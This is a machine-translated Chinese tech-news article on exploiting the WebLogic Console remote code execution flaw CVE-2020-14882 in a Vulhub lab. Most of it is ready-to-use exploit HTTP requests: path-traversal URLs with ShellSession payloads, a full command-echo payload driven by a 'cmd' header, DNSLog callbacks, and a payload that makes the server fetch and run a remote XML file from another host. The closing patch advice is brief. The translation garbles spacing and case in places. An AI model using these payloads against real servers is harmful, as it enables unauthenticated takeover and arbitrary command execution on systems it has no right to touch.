Shulou(Shulou.com)05/31 Report--

How to realize the analysis of Weblogic Console remote code execution vulnerability CVE-2020-14882, aiming at this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

Brief introduction of 0x00 vulnerability

On October 30th, 2020, the latest patch for Oracle's official CVE-2020-14882 Weblogic code execution vulnerability can be bypassed, the vulnerability number is CVE-2020-14882, vulnerability level: critical, vulnerability score: 9.8.

Remote attackers can construct special HTTP requests, take over WebLogic Server Console without authentication, and execute arbitrary code in WebLogic Server Console.

0x01 affects version

Oracle Weblogic Server 10.3.6.0.0

Oracle Weblogic Server 12.1.3.0.0

Oracle Weblogic Server 12.2.1.3.0

Oracle Weblogic Server 12.2.1.4.0

Oracle Weblogic Server 14.1.1.0.0

Recurrence of 0x02 vulnerabilities

Virtual machine deployment docker installation Vulhub one click to build vulnerability test range environment.

Docker-compose up-d

Access to vulnerability environment

Http://192.168.60.130:7001/

Pyload is constructed according to different requirements when exploiting vulnerabilities. At present, there are three commonly used ones:

1. Payload is not echoed after execution, but it has been executed successfully.

Construct payload execution:

GET / console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession ("java.lang.Runtime.getRuntime (). Exec ('touch%20/tmp/yunzui');") HTTP/1.1

Host: 192.168.60.130:7001

Cache-Control: max-age=0

DNT: 1

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.60.130:7001/console/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: ADMINCONSOLESESSIONION color KSLiFfIosk7pDYFYp701K0Svy9 colors G8yZefB7whwyLGLvkhjKbTDROWTRAN 355433482

Connection: close

Content-Length: 4

Effect view

Or use the dnslog platform for verification

Generate DNS domain name: idvek9.dnslog.cn

Construct payload for execution

Effect view

Or use python scripts to exploit vulnerabilities

Effect view

2. Echo after executing payload

Payload submission through GET

GET / console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession ('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread) Thread.currentThread (); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork (); java.lang.reflect.Field field = adapter.getClass (). GetDeclaredField ("connectionHandler"); field.setAccessible (true); Object obj = field.get (adapter) Weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass () .getMethod ("getServletRequest") .invoke (obj); String cmd = req.getHeader ("cmd"); String [] cmds = System.getProperty ("os.name") .toLowerCase () .contains ("window")? New String [] {"cmd.exe", "/ c", cmd}: new String [] {"/ bin/sh", "- c", cmd}; if (cmd! = null) {String result = new java.util.Scanner (new java.lang.ProcessBuilder (cmds). Start (). GetInputStream ()) .useDelimiter ("\ A") .next (); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass (). GetMethod ("getResponse") .invoke (req) Res.getServletOutputStream () .writeStream (new weblogic.xml.util.StringInputStream (result)); res.getServletOutputStream () .flush ();} currentThread.interrupt ();') HTTP/1.1

Host: 192.168.60.130:7001

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Cmd:id

Content-Length: 0

Execute: id

Payload submission through POST

POST / console/css/%252e%252e%252fconsole.portal HTTP/1.1

Host: 192.168.60.130:7001

Cmd: id

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 1258

_ nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession ("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread ()

Weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork ()

Java.lang.reflect.Field field = adapter.getClass () .getDeclaredField ("connectionHandler")

Field.setAccessible (true)

Object obj = field.get (adapter)

Weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass () .getMethod ("getServletRequest") .invoke (obj)

String cmd = req.getHeader ("cmd")

String [] cmds = System.getProperty ("os.name") .toLowerCase () .contains ("window")? New String [] {"cmd.exe", "/ c", cmd}: new String [] {"/ bin/sh", "- c", cmd}

If (cmd! = null) {

String result = new java.util.Scanner (java.lang.Runtime.getRuntime () .exec (cmds) .getInputStream ()) .useDelimiter ("\ A") .next ()

Weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass () .getMethod ("getResponse") .invoke (req)

Res.getServletOutputStream () .writeStream (new weblogic.xml.util.StringInputStream (result))

Res.getServletOutputStream () .flush ()

Res.getWriter () .write ("")

} executeThread.interrupt ()

")

Execute: id

3. Refer to payload by constructing it in XML format

Generate domain name through DNSLog platform: bq11vi.dnslog.cn

Execute (GET)

GET / console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext ("http://192.168.60.1/weblogic.xml") HTTP/1.1"

Host: 192.168.60.130:7001

Cache-Control: max-age=0

DNT: 1

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.60.130:7001/console/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: ADMINCONSOLESESSIONION color KSLiFfIosk7pDYFYp701K0Svy9 colors G8yZefB7whwyLGLvkhjKbTDROWTRAN 355433482

Connection: close

Effect view

Execute (POST)

POST / console/images/%252E%252E%252Fconsole.portal HTTP/1.1

Host: 192.168.60.130:7001

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36

Accept-Encoding: gzip, deflate

Accept: * / *

Connection: keep-alive

Content-type: application/x-www-form-urlencoded; charset=utf-8

Content-Length: 153

CMD:whoami

_ nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext ("http://192.168.60.1/weblogic.xml")

Effect view

0x03 repair recommendation

It is recommended that users temporarily shut down the external access of Weblogic backend / console/console.portal in time.

This time, Oracle's official CPU has released a patch for this vulnerability. Please download the patch and install the update in time.

Note: the official Oracle patch requires users to have a licensed account for genuine software. After logging in to https://support.oracle.com using this account, you can download the latest patch.

This is the answer to the analysis question on how to implement the Weblogic Console remote code execution vulnerability CVE-2020-14882. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.